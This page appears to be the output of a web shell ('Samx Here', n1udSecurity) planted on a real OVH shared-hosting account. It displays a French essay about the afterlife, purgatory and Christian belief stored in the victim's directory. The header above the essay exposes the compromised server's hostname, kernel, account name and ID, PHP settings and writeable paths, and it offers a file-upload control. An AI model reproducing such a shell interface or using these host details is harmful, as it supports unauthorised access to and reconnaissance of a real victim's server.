Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/dieu/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/dieu/Audio/2017-11-04laVieAprèsLaMort.txt
Comme il a été expliqué, selon toutes les religions, la vie est éternelle. C'est-à-dire que la vie se recrée. Elle ressusciterait. La vie crée de nouvelles vies. La religion bouddhiste pense que notre vie est réincarnée dans les animaux. Les religions monothéistes parlent d'au-delà, d'une vie ailleurs après la mort, dans le ciel pour imager. Les âmes acceptées par Dieu iraient dans un univers similaire ou égal à celui de Dieu selon Jésus. 
Nous serions l'égal de Dieu. Nous pourrions agir sur la Terre par cet univers, sans contrainte d'écart de temps. En effet, l'Esprit Saint agit facilement à n'importe quel endroit de la Terre. Selon le Christ, les vies du purgatoire ressusciteraient pour être choisies plus tard selon la miséricorde de Dieu. Ressusciter le Christ, selon les chrétiens, consiste à représenter Dieu, grâce à sa recherche de vérité, qui permet le bonheur. Aussi être optimiste et joyeux permet, aussi, d'atteindre cet univers de Dieu. En effet l'optimisme et la joie font du bien aux autres. Tout ce qui apporte du bien à la société est bon pour Dieu.
La Bible explique que les premiers seront les derniers et que les derniers seront les premiers. Cela veut donc dire que les pauvres deviendront riches. 
Le pauvre veut travailler. Aussi un travail que l'on aime épanouit. Cela veut donc dire qu'on aura des tâches. 
Le pauvre est joyeux avec un rien. Aussi, chercher la vérité rend heureux. Comme la recherche de vérité nous donne la joie, c'est à dire le bonheur, cela veut donc dire que nous serons joyeux avec Dieu, sans parler de jouissance, non voulue par Dieu dans son monde. En effet quelqu'un qui ne fait que jouir finit par créer son malheur. 
Le pauvre a du temps pour penser alors que le riche peut s'occuper facilement. Cela veut donc dire que la méditation et le dialogue, qui seront en nous pour l'éternité, nous donneront des idées. En effet, nous sommes comblés par une vie sobre. 
Nous nous enrichissons beaucoup avec les autres alors que le riche se cloître. Aussi, notre société ne fonctionne que par le lien. Cela veut donc dire que nous aurons toujours besoin des autres. Cela veut donc dire que notre âme ne changera pas beaucoup, qu'il faut l'écouter, contrairement à ce que font les riches. 
Il est cependant possible que nous sachions plus de choses qu'avant, puisque notre monde est imparfait, puisque notre monde est une création, pas un hasard parce qu'il est le contraire du hasard, c'est à dire une organisation. Seulement notre recherche de vérité est profondément ancrée dans notre âme, imparfaite selon la Bible. Donc nous pourrons remettre en cause Dieu.
Seulement Dieu choisit des âmes qui ne peuvent pas devenir le diable. Il veut détruire selon la Bible les âmes injustes, pour garder les âmes justes et mettre les pécheurs dans le purgatoire. Les âmes justes ne se rebellent pas parce que le monde de Dieu est plein de justice. Le purgatoire serait une attente de Dieu, avec des paliers de joie à chaque passage de l'âme vers une meilleure recherche de vérité.
Le purgatoire se retrouverait dans le monde nouveau, qui détruira l'ancien monde, quand Christ arrivera. En effet, on sait que notre univers va vers un autre univers. La Bible explique que cet autre univers va fusionner avec le nôtre, pour créer un nouveau monde où la justice régnerait. Les pêcheurs y seraient ressuscités, pas les injustes. Il est donc possible que les âmes des justes aient grandi pour s'occuper des pécheurs. L'univers vers lequel nous allons comblerait l'imperfection de notre matière.
D'après des phases cachées de l'histoire, notre corps réagit réellement au monde. J'ai marché deux jours. J'ai des courbatures.

Mes Notes

Écrire sur l'utilité de votre vie.

SAMX